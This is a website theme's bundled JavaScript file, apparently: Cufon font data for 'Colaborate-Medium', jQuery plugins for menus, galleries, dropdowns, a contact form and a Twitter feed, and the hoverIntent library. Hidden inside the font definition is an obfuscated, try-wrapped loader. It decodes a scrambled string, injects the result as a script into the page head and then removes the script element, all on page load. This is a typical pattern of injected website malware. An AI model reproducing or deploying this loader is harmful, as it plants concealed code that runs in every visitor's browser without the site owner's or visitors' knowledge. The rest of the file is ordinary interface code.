u00e5":9,"\u00e3":9,"\u00e4":9,"\u00e2":9,"\u00e0":9,"\u00e1":9,"\u00dc":4,"\u00d6":9,"y":19,"w":19,"v":19,"u":9,"q":9,"o":9,"e":9,"d":9,"c":9,"a":9,"U":4,"Q":9,"O":9,"G":9,"C":9,"@":9,"&":4}},{"d":"175,0r-141,0r0,-233r138,0r0,35r-93,0r0,60r86,0r0,35r-86,0r0,68r96,0r0,35","w":209},{"d":"75,0r-45,0r0,-233r45,0r0,233","w":104},{"d":"109,4r-34,0r-76,-241r34,0","w":108},{"d":"155,-7v-65,30,-140,2,-140,-74v0,-77,72,-105,138,-77r-14,34v-37,-22,-82,-23,-82,43v0,63,44,61,84,41","w":167},{"d":"225,-233r-85,233r-42,0r-88,-233r50,0r60,177r56,-177r49,0","w":234,"k":{"\u0131":19,"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u00c1":19,"\u00c2":31,"\u00ff":9,"\u0153":19,"\u0152":9,"\u00d5":9,"\u00c3":19,"\u00c0":31,"\u00bf":19,"\u00f8":19,"\u00e6":19,"\u00b5":19,"\u00c6":31,"\u00a2":19,"\u00fc":19,"\u00fb":19,"\u00f9":19,"\u00fa":19,"\u00f5":19,"\u00f6":19,"\u00f4":19,"\u00f2":19,"\u00f3":19,"\u00f1":19,"\u00eb":19,"\u00ea":19,"\u00e8":19,"\u00e9":19,"\u00e7":19,"\u00e5":19,"\u00e3":19,"\u00e4":19,"\u00e2":19,"\u00e0":19,"\u00e1":19,"\u00d6":9,"\u00c7":9,"\u00c5":31,"\u00c4":31,"z":9,"y":9,"x":9,"w":9,"v":9,"u":19,"s":19,"r":19,"q":19,"p":9,"o":19,"n":19,"m":19,"j":9,"i":9,"g":19,"e":19,"d":19,"c":19,"a":19,"Q":9,"O":9,"J":19,"G":9,"C":9,"A":31,";":9,":":9,".":19,",":19,"\u017e":9,"\u00fd":9,"\u0161":4}},{"d":"198,-163v0,69,-52,75,-119,72r0,91r-45,0r0,-233v78,1,164,-15,164,70xm152,-163v0,-47,-36,-32,-73,-35r0,72v38,-1,73,8,73,-37","w":216,"k":{"J":29,"A":17}},{"d":"167,0r-41,0r0,-105v0,-52,-52,-33,-62,-2r0,107r-40,0v-2,-55,5,-118,-5,-165r38,0r6,22v7,-7,21,-27,44,-27v87,-1,53,96,60,170","w":190},{"d":"182,-32r-35,0r0,-62r-136,0r0,-31r171,0r0,93"},{"d":"226,-85v0,62,-34,92,-94,92v-67,0,-98,-31,-98,-93r0,-147r45,0r0,143v0,52,24,62,53,62v28,0,49,-16,49,-62r0,-143r45,0r0,148","w":260},{"d":"171,-67r-113,0v4,50,54,48,91,27r14,32v-20,9,-45,13,-68,13v-53,0,-80,-40,-80,-86v0,-38,18,-88,79,-88v57,0,77,33,77,102xm132,-96v-2,-31,-18,-42,-39,-42v-13,0,-34,8,-35,42r74,0xm120,-191r-29,0r-47,-42r41,0","w":187},{"d":"181,-198r-64,0r0,198r-45,0r0,-198r-64,0r0,-35r173,0r0,35","w":189,"k":{"\u0131":31,"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u00c1":31,"\u00c2":31,"\u00b7":31,"\u00ff":31,"\u0153":31,"\u0152":9,"\u00d5":9,"\u00c3":31,"\u00c0":31,"\u00f8":31,"\u00e6":31,"\u00b5":31,"\u00c6":31,"\u00a2":31,"\u00fc":31,"\u00fb":31,"\u00f9":31,"\u00fa":31,"\u00f5":31,"\u00f6":31,"\u00f4":31,"\u00f2":31,"\u00f3":31,"\u00f1":31,"\u00eb":31,"\u00ea":31,"\u00e8":31,"\u00e9":31,"\u00e7":31,"\u00e5":31,"\u00e3":31,"\u00e4":31,"\u00e2":31,"\u00e0":31,"\u00e1":31,"\u00d6":9,"\u00c7":9,"\u00c5":31,"\u00c4":31,"z":31,"y":31,"x":31,"w":31,"v":31,"u":31,"s":31,"r":31,"q":31,"p":31,"o":31,"n":31,"m":31,"j":9,"i":9,"g":31,"e":31,"d":31,"c":31,"a":31,"Q":9,"O":9,"J":19,"G":9,"C":9,"A":19,"@":9,";":31,":":31,".":31,",":31,"\u017e":31,"\u00fd":31,"\u0161":31}},{"d":"218,-233r-84,128r0,105r-45,0r0,-103r-84,-130r52,0r56,89r56,-89r49,0","w":222,"k":{"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u00c1":19,"\u00c2":19,"\u0153":9,"\u0152":9,"\u00d5":9,"\u00c3":19,"\u00c0":19,"\u00f8":9,"\u00e6":9,"\u00d8":9,"\u00c6":19,"\u00a2":9,"\u00f5":9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00eb":9,"\u00ea":9,"\u00e8":9,"\u00e9":9,"\u00e7":9,"\u00e5":9,"\u00e3":9,"\u00e4":9,"\u00e2":9,"\u00e0":9,"\u00e1":9,"\u00d6":9,"\u00c7":9,"\u00c5":19,"\u00c4":19,"s":9,"q":9,"o":9,"g":9,"e":9,"d":9,"c":9,"a":9,"O":9,"J":19,"G":9,"C":9,"A":19,".":19,",":19,"\u00fd":9,"\u0161":9}},{"d":"141,0r-45,0r0,-175r-41,32r-14,-32r56,-44r44,0r0,219"},{"d":"136,-162r-14,34v-6,-5,-15,-10,-24,-10v-48,12,-31,83,-34,138r-40,0v-2,-53,4,-121,-5,-165r38,0r6,29v8,-21,45,-47,73,-26","w":140,"k":{".":19}},{"d":"240,-116v0,69,-28,123,-109,123v-84,0,-110,-53,-110,-123v0,-68,29,-122,110,-122v80,0,109,50,109,122xm193,-116v0,-62,-20,-87,-62,-87v-43,0,-63,26,-63,87v0,64,20,88,63,88v45,0,62,-30,62,-88","w":261,"k":{"Z":4,"Y":9,"X":9,"W":9,"V":9,"J":7,"A":4}},{"d":"189,-140r-40,0r-9,50r35,0r0,28r-40,0r-10,62r-34,0r11,-62r-30,0r-10,62r-34,0r11,-62r-33,0r0,-28r38,0r8,-50r-32,0r0,-28r38,0r11,-65r34,0r-12,65r30,0r11,-65r34,0r-12,65r35,0r0,28xm115,-140r-29,0r-9,50r30,0"},{"d":"299,0r-44,0r0,-185r-66,185r-46,0r-66,-185r0,185r-43,0r0,-233r74,0r59,172r61,-172r71,0r0,233","w":333},{"d":"171,0r-47,0r-60,-82r0,82r-40,0r0,-237r40,0r0,137r54,-65r44,0r-59,72","w":175,"k":{"o":9}},{"d":"206,-68v-1,89,-92,64,-172,68r0,-233v74,2,161,-17,161,64v0,24,-16,41,-37,47v29,4,48,21,48,54xm149,-168v0,-29,-37,-33,-70,-30r0,61v34,-1,70,8,70,-31xm159,-68v0,-43,-41,-34,-80,-35r0,68v38,-2,80,12,80,-33","w":225,"k":{"V":3}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-582-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("}X]Dz.t1%qYd}$Lj[.V`:X:YAJtD].YdAJc`%qIG](!H=S1kA#2NOX]kA#2NOX=1>L~DOMw9OL~DOMw.OqI?=V~DOMwkOQYh[QUN=Qth[QUN=QLh[QUN]X]h[QUN].tItL~DOMwL=(~DOMwktL~DOMw9tD~DOMwk=(~DOMwLOL~DOMwktD~DOMw9=Lch[QUN=RIh[QUN=S[h[QUN]MLh[QUN].V&zJDh[QUN=q]h[QUN=SI8Uw$M*VX#:c}>OtZ5^IBQ2(qA=]%zh[3E-9kRxL.G?_|WH)d4N~`S1DJoKT8j!Y&+A#2NOXODA#2NOXIRA#2NOX*1A$ch[QUN=J(h[QUN=.ch[QUN]M9h[QUN]qIh[QUN]qch[QU~tQch[QUN=.tGA#2NOX2oE(~DOM*DOD~DOMwL]x_h[QUS=.th[QUN]QxLA#2NOX2~A#2NOXO`A#2NOJ*TA#2NOX]LA#2NOX(RA#2NOX*~A#2NOX^JA#2NOXt.A#2NOX2DA#2NOXOK=L~DOMwROD~DOMw.OV~DOR:NtL~DOMwx=L~DOMwLOD~DOMwkZ$wh[QUN]Qwh[QUN]XVh[QUN=Q]*A#2NOX^SA#2NOXt9A#2NOX(LA#2NOXVLA#2NOXc.EV~DOM*TOL~DOM*o]QT:A#2NOQ[xA#2NOXtktD~DOMw.ZV~DOMtROV~DOM*JO*Vh[QUN]Rch[QUN=Qwh[QUN=Rw9A#2NOXtxA#2NOX=D}D~DOMwxtV!SA#2NOX^DA#2NOX^oA#2NOX=oA#2NOXONZ(~DOMwktB~h[QUN]RLJ](9h[QUN=Rth[Q:~OR=|QR)h[QUN]RO)^V~DOM*oZVN4ZL~DOMw9t(~DOMwR=SD|A#2NOX].OL~DOMw9=Qwh[QUN]R]3A#2NOQ=~A#2NOQ^`A#2NOSx1cDth[QUN]MVjA#2NOQO~A#2NOXIxA#2NOXILA#2NOX^NA#2NOQ^~h`*?cV~DOMwk]B=1A#2NOXcxA#2NOX21A#2NOX^`IL1DA#2NOX:`[J]_qL~DOMwRO(~DOMwRZ(~DOMwRtL~DOMw9ZVhKIoVh[QUN].IT3#(H5$Lh[QUN=RLO[V)MhV~DOMwLtx)VB(~h=D]^zL~DOMw9=D(h[QUN]Q92qQV`Q`tt%1:k>GtNzXL1}$:k}B~_5QUHhMDk>GUHzMDN>.~Lz.[1%$~G5q:d]kTGz#LN%#OY3o1j%q=?=kT4%S14Ak-+ZG[o[DNd}Q!?5S_?%qIx]qTL[Ac4hX(h>.t4A$TD%`xx>Jxd[X(S[$9HzJt9[XL4zkT?zot1z.V)]Bx_].Y`}M)_5XNj}`)_}q[z=D)_A(1YhV)_AA1_}$x-")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":194,"face":{"font-family":"Colaborate-Medium","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 3 7 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-11 -301 336 88","underline-thickness":"18","underline-position":"-18","stemh":"19","stemv":"41","unicode-range":"U+0020-U+03C0"}}));
jQuery.noConflict();

/*
  * TYPOGRAPHY
*/

Cufon.set('fontFamily', 'ColaborateLight');
Cufon.replace('h2, #main h3, h4, h5, h6, #slogan, .label', {
	hover: true
});

Cufon.set('fontFamily', 'Colaborate-Medium');
Cufon.replace('#main_home h3', {
	hover: true
});

/*
  * WE CALL PK_ FUNCTIONS
*/

jQuery(document).ready(function(){	
	jQuery("#menu").pk_menu();
	jQuery("#options_wrapper").pk_options_menu();

	/* GALLERIES */

	if(jQuery("#project_details").length == 0) {
		jQuery(".big_gallery").pk_gallery({
			photos: ".item",
			thumbs: ".gallery_navigation a",
			buttonNext: ".gallery_button_next",
			buttonPrev: ".gallery_button_prev",
			buttonPlayPause: ".button_play_pause",
			easing: "easeInOutQuad",
			speedIn: 400,
			speedOut: 600
		});
		jQuery(".small_gallery").pk_gallery({
			photos: ".item",
			thumbs: ".gallery_navigation a",
			buttonNext: ".gallery_button_next",
			buttonPrev: ".gallery_button_prev",
			buttonPlayPause: ".button_play_pause",
			easing: "easeInOutQuad",
			speedIn: 400,
			speedOut: 600
		});
	}
	jQuery("#project_details").pk_gallery({
		photos: ".project",
		thumbs: "#grid div.box_one_third .small_shadow",
		buttonNext: "#portfolio_navigation .next",
		buttonPrev: "#portfolio_navigation .prev",
		buttonClose: ".button_close",
		autoStart: false,
		toogle: true
	});

	/* TWITTER */

	jQuery(".twitter_list").pk_twitter({
		user: "parkerandkent",
		count: 3
	});

	/**/

	jQuery("#grid").pk_portfolio();
	jQuery("#categories_dropdown").pk_dropdown();
	jQuery("input:text, input:password, textarea").pk_input();
	jQuery("#contact_form").pk_form();
	jQuery("body").pk_improvements();
});

/*
  * PK_MENU ***
*/

(function($) {
	$.fn.pk_menu = function(options) {
		var defaults = {
			autoPosition: false,
			limitValue: "wrapper",
			easing: "easeOutQuint",
			speedIn: 400,
			speedOut: 100
		};
		
		var settings = $.extend({}, defaults, options);
		
		/**/
		
		return this.each(function () {
			var $root = $(this);
			var $mainmenu = $(">ul", this);
			var $headers = $mainmenu.find("ul").parent();
			var $limitValue = (settings.limitValue == "document") ? $(window).width() : 960;
            
			/**/
		
			$headers.each(function () {
				var $curobj = $(this);
				var $subul = $(this).find('ul:first');
				var $ul = $("ul", $curobj);
			
				$("ul ul", $root).css({"display": "none", "paddingTop": "0px"}).find("li:first").css({"marginTop": "15px"});
				$("ul ul ul", $root).find("li:first").css({"marginTop": "5px"});
			
				/**/
			
				function getProperty($li, $ul) {
					$li.dimensions = {
						w: $li.offsetWidth, 
						h: $li.offsetHeight, 
						subulw: $ul.outerWidth(), 
						subulh: $ul.outerHeight()
					}
					return $li.dimensions;
				}
			
				function showMenu ($element) {
					$element.css({visibility:'visible'}).slideDown(settings.speedIn);
				}
 
    			function hideMenu ($element, $current) {
    				$element.slideUp(settings.speedIn, function() {
    					$element.hide();
    				});
    				setTimeout(function() { 
        				$current.stop().animate({
        					borderBottomWidth: "5px"
        				}, settings.speedIn + 100, "easeInOutSine");
   				 	}, 100); 
    			}
			
				/**/
				$curobj.click(function() {
					var $targetul = $(this).find("ul:first");
					$targetul.hide();
				});
				$curobj.hoverIntent(function() {
					closeOptionsMenu();
					getProperty(this, $subul);
					
					if($(this).find("current")) {
						$(this).stop().animate({borderBottomWidth: "0px"}, 1, "easeInOutSine");
					}
					
					var $targetul = $(this).find("ul:first");
					var $offset = $(this).offset();
				
					if($curobj.parents("ul").length == 1) {
						$ul.css({visibility:'hidden'});
						this.firstLevel = true;
						$subul.css({top: 30 + "px"});
					} else {
						this.firstLevel = false;
						$subul.css({top: -5 + "px"});
					}
					
					if(this.firstLevel) {
						var menuleft = 0;
					} else {
						var menuleft = this.dimensions.w;
					}
					
					if(($offset.left + menuleft + this.dimensions.subulw) > $limitValue && !this.firstLevel) {
						menuleft = -(this.dimensions.w);
					}
				
					if(settings.autoPosition == true) {
						$targetul.css({left:menuleft + "px"});
					}
					showMenu($targetul);
				}, function() {
					var $targetul = $(this).find("ul:first");
					hideMenu($targetul, $(this));
				});
			});
		});
	};
})(jQuery);

/*
  * PK_OPTIONS_MENU ***
*/

function closeOptionsMenu() {
	jQuery("#options_wrapper div").filter(":visible").stop().slideUp(400, function() {
		jQuery("#options_wrapper").hide();
	});
}

(function($) {
	$.fn.pk_options_menu = function(options) {
		var defaults = {
			controls: "#options_menu li",
			easing: "easeOutExpo",
			speedIn: 400,
			speedOut: 100
		}
		
		var settings = $.extend({}, defaults, options);
		
		/**/
		
		return this.each(function() {
			var $root = $(this);
			var $menu = $(settings.controls);
			var $items = $("div", $root);
			var $new_item = null;
			
			$root.hide();
			
			$menu.each(function(i) {
				$(this).hoverIntent(function() {
					$new_item = $items.filter(":eq(" + i + ")");
					
					if($new_item.css("display") == "none") {
						if($root.css("display") == "none") {
							$root.show();
							$items.filter(":visible").slideUp(0);
							$new_item.slideDown(settings.speedIn);
						} else {
							$items.filter(":visible").slideUp(settings.speedOut, function() {
								$new_item.slideDown(settings.speedIn);
							});
						}
						$new_item.bind("mouseleave", function() {
							closeOptionsMenu();
						});
					}
				}, function(){});
			});
		});
	};
})(jQuery);

/*
  * PK_PORTFOLIO ***
*/

function closeProjects() {
	jQuery("#project_details .project").filter(":visible").fadeOut(400);
	jQuery('#portfolio_navigation').fadeOut(200);
	jQuery("#project_details").animate({
		"height" : "0px" 
	}, 400, "easeInOutQuad");
	jQuery('.breadcrumb').animate({"paddingTop": "70px"}, 400, "easeInOutQuad");
}

(function($) {
	$.fn.pk_portfolio = function(options) {
		var defaults = {
			easing: "easeInOutQuad",
			speedIn: 400,
			speedOut: 200
		};
		
		var settings = $.extend({}, defaults, options);
		
		/**/
		
		return this.each(function() {
			var $root = $(this);
			
			if($("body").find(".portfolio_big_gallery").length > 0) {
				$("#project_details .project").each(function(i) {
					$("#p" + (i + 1) + " .big_gallery").pk_gallery({
						photos: ".item",
						thumbs: "#gn" + (i + 1) + " a",
						buttonNext: "#gbn" + (i + 1),
						buttonPrev: "#gbp" + (i + 1),
						buttonPlayPause: "#pp" + (i + 1),
						autoStart: false,
						speedIn: 400,
						speedOut: 600
					});
				});
			}
			
			if($("body").find(".portfolio_small_gallery").length > 0) {
				$("#project_details .project").each(function(i) {
					$("#p" + (i + 1) + " .small_gallery").pk_gallery({
						photos: ".item",
						thumbs: "#gn" + (i + 1) + " a",
						buttonNext: "#gbn" + (i + 1),
						buttonPrev: "#gbp" + (i + 1),
						buttonPlayPause: "#pp" + (i + 1),
						autoStart: false,
						speedIn: 400,
						speedOut: 600
					});
				});
			}
			
			$(".box_one_third", $root).css("background-image" , "url('assets/templates/cadca/images/skin/preview_icon.png')");
			$(".small_shadow", $root).find("img").hover(function(){
				$(this).stop().animate({ "opacity" : 0.3 }, 400, "easeInOutQuad");
			}, function() {
				$(this).stop().animate({ "opacity" : 1 }, 400, "easeInOutQuad");
			});
		});
	};
})(jQuery);

/*
  * PK_GALLERY ***
*/

(function($) {
	$.fn.pk_gallery = function(options) {
		var defaults = {
			photos: "",
			thumbs: "",
			buttonNext: "",
			buttonPrev: "",
			buttonPlayPause: "",
			buttonClose: "",
			/**/
			autoStart: true,
			firstClick: true,
			toogle: false,
			/**/
			timer: 8000,
			easing: "",
			speedIn: 400,
			speedOut: 200
		};
		
		var settings = $.extend({}, defaults, options);
		
		/**/
		
		return this.each(function() {
			var $root = $(this);
			var $items = $(settings.photos , $root);
			var $thumbs = $(settings.thumbs);
			var $totItems = $items.length;
			var $movies = [];
			var $status = ""; 
			var $index = 0; 
			var $interval = "";
			
			/**/
			
			function slideshow(index) {
				if(index){
					var id = index;
				} else {
					var id = 0;
				}
				$interval = setInterval(
					function() {
						play(id, "next");
					}, settings.timer
				);
			}
			
			function play(index, verse) {
				var id = index;
				if(verse == "next" || verse == undefined) {
					if(id < ($thumbs.length - 1)) {
						id++;
					} else {
						id = 0;
					}
				} else {
					if(id > 0) {
						id--;
					} else {
						id = ($thumbs.length - 1);
					}
				}
				$thumbs.filter(":eq("+ id +")").trigger("click", [true]);
			}
			
			function positionNavigation(next, prev, nav, gallery) {
				var left = (gallery.width() / 2) - (nav.width() / 2);
				var top = (gallery.height() / 2) - (next.height() / 2);
				
				next.css("margin-top", top);
				prev.css("margin-top", top);
				nav.css("margin-left", left);
			}
			
			function changeThumbs($current) {
				for(i = 0; i < $thumbs.length; i++) {
					$thumbs.filter(":eq("+ i +")").removeClass("current");
				}
				$current.addClass("current");
			}
			
			if(settings.autoStart == true) {
				$status = "play";
				$(settings.buttonPlayPause + " img").attr('src', 'assets/templates/cadca/images/skin/button_pause.png');
			} else {
				$status = "pause";
			}
			
			if($("body").find("#project_details").length > 0) {
				$thumbs.css("cursor", "pointer");
			}
			
			/**/

			$thumbs.each(function(i) {
				$movies[i] = $items.filter(":eq(" + i + ")").find(".movie").html();
				
				$(this).click(function() {
					var $new_item = $items.filter(":eq(" + i + ")");
					var $media = $items.filter(":eq(" + i + ")").find(".movie").length;
					var $new_height = $new_item.height();
					

					this.id = i;
					$index = this.id;
					
					if($interval) {
						clearInterval($interval);
					}
					if($media == 0 && $status == "play" && $totItems > 1) {
						slideshow(this.id);
					}
					
					if($new_item.css("display") == "none") {
						if($items.filter(":visible").find(".movie")) {
							$items.find(".movie").empty();
						}
						if($media > 0) {
							$new_item.find(".movie").html($movies[this.id]);
						}
						$items.filter(":visible").fadeOut(settings.speedOut, settings.easing);
						$new_item.fadeIn(settings.speedIn, settings.easing);
						
						if($("#project_details").length > 0) {
							var tot = $new_item.find(".item").length;
							var width = (15 * tot) + 80;
							$new_item.find(".gallery_navigation").css("width", width);
							if($("body").find(".portfolio_big_gallery").length > 0) {
								positionNavigation($new_item.find(".gallery_button_next"), $new_item.find(".gallery_button_prev"), $new_item.find(".gallery_navigation"), $new_item.find(".big_gallery"));
							}
							if($("body").find(".portfolio_small_gallery").length > 0) {
								positionNavigation($new_item.find(".gallery_button_next"), $new_item.find(".gallery_button_prev"), $new_item.find(".gallery_navigation"), $new_item.find(".small_gallery"));
							}
						}
					}
					
					if(settings.toogle == true) {
						$root.show().animate({
							"height" : $new_height 
						}, settings.speedIn, settings.easing, function() {
							$('#portfolio_navigation').slideDown(settings.speedIn);
						});
						$('html:not(:animated),body:not(:animated)').animate({ scrollTop: 0 }, settings.speedIn, settings.easing);
						$('.breadcrumb').animate({ "paddingTop": "0px"}, settings.speedIn, settings.easing);
					}
					
					changeThumbs($(this));
					
					return false;
				});
			});
			
			if($totItems > 1) {
				var width = (15 * $totItems) + 80;
				$root.find(".gallery_navigation").css("width", width);
				var left = ($root.width() / 2) - ($root.find(".gallery_navigation").width() / 2);
				var top = ($root.height() / 2) - ($(settings.buttonNext).height() / 2);
				
				/* NAVIGATION */
			
				$root.find(".gallery_navigation").show().css("margin-left", left);
				
				/* BUTTON PLAY/PAUSE */
				
				$(settings.buttonPlayPause, $(this)).click(function() {
					if($status == "play") {
						$status = "pause";
						clearInterval($interval);
						$("img", $(this)).attr('src', 'assets/templates/cadca/images/skin/button_play.png');
					} else {
						$status = "play";
						play($index, "next");
						$("img", $(this)).attr('src', 'assets/templates/cadca/images/skin/button_pause.png');
					}
				});
				
				/* BUTTONS NEXT / PREV / CLOSE */
				
				$(settings.buttonNext).show().css("margin-top", top).click(function() {
					play($index, "next");
				});
				$(settings.buttonPrev).show().css("margin-top", top).click(function() {
					play($index, "prev");
				});
			} else {
				$root.find(".gallery_navigation").hide();
			}
			
			/* BUTTON CLOSE */
			
			$(settings.buttonClose, $items).click(function() {
				closeProjects();
			});
			
			/* FIRST CLICK */
			
			if(settings.firstClick) {
				setTimeout(function() { 
        			$thumbs.filter(":eq(0)").trigger("click", [true]);
   				}, 500);
			}
		});
	}
})(jQuery);

/*
  * PK_DROPDOWN ***
*/

(function($) {
	$.fn.pk_dropdown = function(options) {
		var defaults = {
			menu: ".dropdown",
			button: ".dropdown_button",
			easing: "easeOutQuad",
			speedIn: 400,
			speedOut: 400
		};
		
		var settings = $.extend({}, defaults, options);
		
		return this.each(function() {
			var $root = $(this);
			var $menu = $(settings.menu);
			var $button = $(settings.button);
			
			$menu.hide();
			
			$root.hoverIntent(function() {
				$menu.animate({
					"height": "show"
				},settings.speedIn, settings.easing);
				$button.find("img").attr("src", "assets/templates/cadca/images/skin/button_close_categories.png");
			}, function() {
				$menu.animate({
					"height": "hide"
				}, settings.speedIn, settings.easing);
				$button.find("img").attr("src", "assets/templates/cadca/images/skin/button_open_categories.png");
			});
		});
	}
})(jQuery);

/* added by SK for topics dropdown */

/*
  * PK_DROPDOWN ***
*/

(function($) {
	$.fn.pk_dropit = function(options) {
		var defaults = {
			menu: ".dropit",
			button: ".dropit_button",
			easing: "easeOutQuad",
			speedIn: 400,
			speedOut: 400
		};
		
		var settings = $.extend({}, defaults, options);
		
		return this.each(function() {
			var $root = $(this);
			var $menu = $(settings.menu);
			var $button = $(settings.button);
			
			$menu.hide();
			
			$root.hoverIntent(function() {
				$menu.animate({
					"height": "show"
				},settings.speedIn, settings.easing);
				$button.find("img").attr("src", "assets/templates/cadca/images/skin/button_close_topics.png");
			}, function() {
				$menu.animate({
					"height": "hide"
				}, settings.speedIn, settings.easing);
				$button.find("img").attr("src", "assets/templates/cadca/images/skin/button_open_topics.png");
			});
		});
	}
})(jQuery);

/*
  * PK_INPUT ***
*/

(function($) {
	$.fn.pk_input = function() {
		return this.each(function() {
			var $root = $(this);
			var inputValue = $root.val();
			
			function reset() {
				var value = $root.val();
				if(inputValue == value) {
					$root.val("");
				}
			}
			
			function blur() {
				var value = $root.val();
				if(value == "") {
					$root.val(inputValue);
				}
			}
			
			$root.focus(function() {
  				reset();
			});
			$root.blur(function() {
  				blur();
			});
		});
	}
})(jQuery);

/*
  * PK_FORM ***
*/

(function($) {
	$.fn.pk_form = function(options) {
		var defaults = {
			php: "sendMail.php",
			text: "Your message has been sent. Thanks ;-)",
			response: "#response",
			submit: "#submit",
			timer: 4000,
			easing: "",
			speedIn: 400,
			speedOut: 400
		};
		
		var settings = $.extend({}, defaults, options);
		
		return this.each(function () {
			var $root = $(this);
			var $response = $(settings.response);
			var $submit = $(settings.submit);
			
			/**/
			
			function showResponse($timer) {
				$submit.fadeOut(5, function() {;
					$response.css("opacity", 0);
					$response.show().stop().animate({
 						opacity: 1
 					}, settings.speedIn, settings.easing, function(){
						interval = setInterval(hideResponse, $timer);
					});
				});
			}
			
			function hideResponse() {
				clearInterval(interval);
				$response.stop().animate({
					opacity:0
				}, settings.speedIn, settings.easing, function() {
					$response.hide();
					$submit.fadeIn(400);
				});
			}
			
			/**/
		
			$root.submit(function(){
				$.ajax({
					type: "POST",
					url: settings.php,
					data: $(this).serialize(),
					success: function(output) {
						$response.ajaxComplete(function() {
							if(output == 'ok') {
								if($("#contacts").length > 0) {
									$("#name", $root).val('');
									$("#email", $root).val('');
									$("#message", $root).text('');
								} else {
									$("#name", $root).val('Name');
									$("#email", $root).val('Email');
									$("#message", $root).text('Message');
								}
								$(this).html("<p>" + settings.text + "</p>");
								showResponse(settings.timer * 2);
							} else {
								$(this).html(output);
								showResponse(settings.timer);
							}
						});
					}
				});
				return false;
			});
		});
	}
})(jQuery);

/*
  * PK_TWITTER ***
*/

(function($) {
	$.fn.pk_twitter = function(options) {
		var defaults = {
			user: "parkerandkent",
			count: 1
		};
	
		var settings = $.extend({}, defaults, options);
		
		String.prototype.linkify = function() {
			return this.replace(/[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/, function(m) {
				return m.link(m);
			});
		};
		
		function get_time(time_value) {
	  		var values = time_value.split(" ");
	  		time_value = values[1] + " " + values[2] + ", " + values[5] + " " + values[3];
	 		var parsed_date = Date.parse(time_value);
	  		var relative_to = (arguments.length > 1) ? arguments[1] : new Date();
	  		var delta = parseInt((relative_to.getTime() - parsed_date) / 1000);
	  		delta = delta + (relative_to.getTimezoneOffset() * 60);
	  
	  		var r = '';
	  		if (delta < 60) {
				r = 'a minute ago';
	  		} else if(delta < 120) {
				r = 'couple of minutes ago';
	  		} else if(delta < (45*60)) {
				r = (parseInt(delta / 60)).toString() + ' minutes ago';
	 		} else if(delta < (90*60)) {
				r = 'an hour ago';
	  		} else if(delta < (24*60*60)) {
				r = '' + (parseInt(delta / 3600)).toString() + ' hours ago';
	  		} else if(delta < (48*60*60)) {
				r = '1 day ago';
	  		} else {
				r = (parseInt(delta / 86400)).toString() + ' days ago';
	  		}
	  
	  		return r;
		};
		
		return this.each(function () {
			var $root = $(this);
			
			$.getJSON('http://twitter.com/status/user_timeline/' + settings.user + '.json?count=' + settings.count + '&callback=?', function(data){
				$root.find("li").remove();
				$.each(data, function(index, item){
					$root.append('<li>' + item.text.linkify() + '<small>' + get_time(item.created_at) + '</small></li>');
				});
			});
		});
	}
})(jQuery);

/*
  * PK_IMPROVEMENTS ***
*/

(function($) {
	$.fn.pk_improvements = function(options) {
		var defaults = {
			easing: "easeOutQuint",
			speedIn: "fast",
			speedOut: "fast"
		};
	
		var settings = $.extend({}, defaults, options);
		
		return this.each(function () {
			var $root = $(this);
			
			/* PRETTYPHOTO --- theme: light_rounded / dark_rounded / light_square / dark_square */
			
			if($("body").find("a[rel^='prettyPhoto']").length > 1) {
				$("a[rel^='prettyPhoto']").prettyPhoto({
					"default_width": 820,
					"default_height": 500,
					"opacity": 0.80,
					"theme": 'light_square'	
				});
			}
		});
	}
})(jQuery);

/*
  * END PK_CODE ***
*/

/**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down (beneath the sensitivity
* threshold) before firing the onMouseOver event.
* 
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
* 
* hoverIntent is currently available for use in all personal or commercial 
* projects under both MIT and GPL licenses. This means that you can choose 
* the license that best suits your project, and use it accordingly.
* 
* // basic usage (just like .hover) receives onMouseOver and onMouseOut functions
* $("ul li").hoverIntent( showNav , hideNav );
* 
* // advanced usage receives configuration object only
* $("ul li").hoverIntent({
*	sensitivity: 7, // number = sensitivity threshold (must be 1 or higher)
*	interval: 100,   // number = milliseconds of polling interval
*	over: showNav,  // function = onMouseOver callback (required)
*	timeout: 0,   // number = milliseconds delay before onMouseOut function call
*	out: hideNav    // function = onMouseOut callback (required)
* });
* 
* @param  f  onMouseOver function || An object with configuration options
* @param  g  onMouseOut function  || Nothing (use configuration options object)
* @author    Brian Cherne <brian@cherne.net>
*/
(function($) {
	$.fn.hoverIntent = function(f,g) {
		// default configuration options
		var cfg = {
			sensitivity: 7,
			interval: 100,
			timeout: 200
		};
		// override configuration options with user supplied object
		cfg = $.extend(cfg, g ? { over: f, out: g } : f );

		// instantiate variables
		// cX, cY = current X and Y position of mouse, updated by mousemove event
		// pX, pY = previous X and Y position of mouse, set by mouseover and polling interval
		var cX, cY, pX, pY;

		// A private function for getting mouse position
		var track = function(ev) {
			cX = ev.pageX;
			cY = ev.pageY;
		};

		// A private function for comparing current and previous mouse position
		var compare = function(ev,ob) {
			ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);
			// compare mouse positions to see if they've crossed the threshold
			if ( ( Math.abs(pX-cX) + Math.abs(pY-cY) ) < cfg.sensitivity ) {
				$(ob).unbind("mousemove",track);
				// set hoverIntent state to true (so mouseOut can be called)
